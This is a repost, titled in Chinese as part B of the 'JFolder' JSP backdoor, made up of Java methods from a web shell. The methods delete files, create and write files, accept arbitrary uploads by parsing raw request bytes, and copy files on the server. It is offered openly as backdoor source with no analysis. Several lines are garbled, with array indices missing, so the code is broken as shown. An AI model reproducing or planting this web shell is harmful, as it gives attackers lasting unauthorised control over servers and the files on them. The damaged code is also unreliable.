JFolder_JSP后门代码

JFolder_JSP后门代码（B）

return sRet;

}

public String deleteFile(String path, String curUri, String[] files2Delete) {

String sRet = "";

File tmpFile = null;

try {

for (int i = 0; i < files2Delete.length; i ++) {

   tmpFile = new File(files2Delete);

   if (! tmpFile.delete()) {

    sRet += "<font color=\"red\">删除\"" + files2Delete + "\"失败</font><br>\n";

   }

}

if (sRet.equals("")) {

   sRet = "删除成功，正在返回，请稍候……\n";

   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";

}

} catch (SecurityException e) {

sRet = "<font color=\"red\">安全问题，没有权限执行该操作</font>\n";

}

return sRet;

}

public String saveAs(String path, String curUri, String fileContent) {

String sRet = "";

File file = null;

FileWriter fileWriter = null;

try {

file = new File(path);

if (file.createNewFile()) {

   fileWriter = new FileWriter(file);

   fileWriter.write(fileContent);

   fileWriter.close();

   

   sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />";

} else {

   sRet = "<font color=\"red\">文件\"" + path + "\"已经存在</font>";

}

} catch (IOException e) {

sRet = "<font color=\"red\">创建文件\"" + path + "\"失败</font>";

}

return sRet;

}

public String uploadFile(ServletRequest request, String path, String curUri) {

String sRet = "";

File file = null;

InputStream in = null;

path = pathConvert(path);

try {

in = request.getInputStream();

byte[] inBytes = new byte[request.getContentLength()];

int nBytes;

int start = 0;

int end = 0;

int size = 1024;

String token = null;

String filePath = null;

//

// 把输入流读入一个字节数组

//

while ((nBytes = in.read(inBytes, start, size)) != -1) {

   start += nBytes;

}

in.close();

//

// 从字节数组中得到文件分隔符号

//

int i = 0;

byte[] seperator;

while (inBytes != 13) {

   i ++;

}

seperator = new byte;

for (i = 0; i < seperator.length; i ++) {

   seperator = inBytes;

}

//

// 得到Header部分

//

String dataHeader = null;

i += 3;

start = i;

while (! (inBytes == 13 && inBytes[i + 2] == 13)) {

   i ++;

}

end = i - 1;

dataHeader = new String(inBytes, start, end - start + 1);

//

// 得到文件名

//

token = "filename=\"";

start = dataHeader.indexOf(token) + token.length();

token = "\"";

end = dataHeader.indexOf(token, start) - 1;

filePath = dataHeader.substring(start, end + 1);

filePath = pathConvert(filePath);

String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);

//

// 得到文件内容开始位置

// 

i += 4;

start = i;

/*

boolean found = true; 

byte[] tmp = new byte[seperator.length];

while (i <= inBytes.length - 1 - seperator.length) {

   for (int j = i; j < i + seperator.length; j ++) { 

    if (seperator[j - i] != inBytes[j]) {

     found = false;

     break;

    } else

     tmp[j - i] = inBytes[j];

   }

   

   if (found)

    break;

   

   i ++;

}*/

//

// 偷懒的办法

//

end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;

//

// 保存为文件

//

File newFile = new File(path + fileName);

newFile.createNewFile();

FileOutputStream out = new FileOutputStream(newFile);

//out.write(inBytes, start, end - start + 1);

out.write(inBytes, start, end - start + 1);

out.close();

sRet = "<script language=\"javascript\">\n";

sRet += "alert(\"文件上传成功" + fileName + "\");\n";

sRet += "</script>\n";

} catch (IOException e) {

sRet = "<script language=\"javascript\">\n";

sRet += "alert(\"文件上传失败\");\n";

sRet += "</script>\n";

}

sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";

return sRet;

}

public boolean fileCopy(String srcPath, String dstPath) {

boolean bRet = true;

try {

FileInputStream in = new FileInputStream(new File(srcPath));

FileOutputStream out = new FileOutputStream(new File(dstPath));

byte[] buffer = new byte[1024];

int nBytes;

while ((nBytes = in.read(buffer, 0, 1024)) != -1) {

   out.write(buffer, 0, nBytes);

}

in.close();

out.close();

} catch (IOException e) {

bRet = false;

}

return bRet;

}

public String getFileNameByPath(String path) {

String sRet = "";

path = pathConvert(path);

if (path.lastIndexOf("/") != -1) {

sRet = path.substring(path.lastIndexOf("/") + 1);

} else {

sRet = path;

}

return sRet;

}